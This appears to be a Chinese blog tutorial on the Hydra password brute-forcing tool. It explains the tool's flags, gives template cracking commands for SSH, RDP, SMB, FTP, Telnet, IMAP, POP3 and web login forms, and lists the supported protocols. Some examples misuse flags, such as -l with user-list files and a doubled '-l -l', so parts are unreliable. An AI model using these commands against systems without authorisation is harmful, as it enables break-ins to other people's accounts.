hydra 爆破应用

hydra 爆破应用

xhydra使用
xhydra是hydra的可视化工具,在kali命令行中输入xhydra即可开启

参数详解

-l 指定单个用户名,适合在知道用户名爆破用户名密码时使用
-L 指定多个用户名,参数值为存储用户名的文件的路径(建议为绝对路径)
-p 指定单个密码,适合在知道密码爆破用户名时使用
-P 指定多个密码,参数值为存贮密码的文件(通常称为字典)的路径(建议为绝对路径)
-C 当用户名和密码存储到一个文件时使用此参数。注意,文件(字典)存储的格式必须为 “用户名:密码” 的格式。
-M 指定多个攻击目标,此参数为存储攻击目标的文件的路径(建议为绝对路径)。注意:列表文件存储格式必须为 “地址:端口”
-t 指定爆破时的任务数量(可以理解为线程数),默认为16
-s 指定端口,适用于攻击目标端口非默认的情况。例如:http服务使用非80端口
-S 指定爆破时使用 SSL 链接
-R 继续从上一次爆破进度上继续爆破
-v/-V 显示爆破的详细信息
-f 一但爆破成功一个就停止爆破
server 代表要攻击的目标(单个),多个目标时请使用 -M 参数
service 攻击目标的服务类型(可以理解为爆破时使用的协议),例如 http,在hydra中,不同协议会使用不同的模块来爆破,>

hydra 的http-get 和 http-post 模块就用来爆破基于 get 和 post 请求的页面
OPT 爆破模块的额外参数,可以使用 -U 参数来查看模块支持那些参数,例如命令:hydra -U http-get

使用示例

  • 破解ssh的密码
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh
hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh
hydra -L users.txt -P password.txt -vV -o ssh.log -e ns IP ssh
  • 破解https:
    hydra -m /index.php -l username -P pass.txt IP https

  • 破解teamspeak:
    hydra -l user.txt -P password.txt -s 端口号 -vV ip teamspeak

  • 破解smb:
    hydra -l administrator -P pass.txt IP smb

  • 破解pop3:
    hydra -l muts -P pass.txt my.pop3.mail pop3

  • 破解rdp:
    hydra IP rdp -l administrator -P pass.txt -V

  • 破解http-proxy:
    hydra -l admin -P pass.txt http-proxy://0.0.0.0

  • 破解telnet
    hydra IP telnet -l user.txt -P password.txt -t 32 -s 23 -e ns -f -V

  • 破解ftp:
    hydra IP ftp -l user.txt -P password.txt -t 线程(默认16) -vV
    hydra IP ftp -l -l user.txt -P password.txt -e ns -vV

  • get方式提交,破解web登录:
    hydra -l user.txt -P password.txt -t 线程 -vV -e ns IP http-get /admin/
    hydra -l user.txt -P password.txt -t 线程 -vV -e ns -f IP http-get /admin/index.php

  • post方式提交,破解web登录:
    hydra -l user.txt -P password.txt -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password"

  • 破解imap:
    hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
    hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN

支持协议

* Asterisk
* AFP
* Cisco AAA
* Cisco auth
* Cisco enable
* CVS
* Firebird
* FTP
* HTTP-FORM-GET
* HTTP-FORM-POST
* HTTP-GET
* HTTP-HEAD
* HTTP-POST
* HTTP-PROXY
* HTTPS-FORM-GET
* HTTPS-FORM-POST
* HTTPS-GET
* HTTPS-HEAD
* HTTPS-POST
* HTTP-Proxy
* ICQ
* IMAP
* IRC
* LDAP
* MS-SQL
* MYSQL
* NCP
* NNTP
* Oracle Listener
* Oracle SID
* Oracle
* PC-Anywhere
* PCNFS
* POP3
* POSTGRES
* RDP
* Rexec
* Rlogin
* Rsh
* RTSP
* SAP/R3
* SIP
* SMB
* SMTP
* SMTP Enum
* SNMP v1+v2+v3
* SOCKS5
* SSH (v1 and v2)
* SSHKEY
* Subversion
* Teamspeak (TS2)
* Telnet
* VMware-Auth
* VNC
* XMPP
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值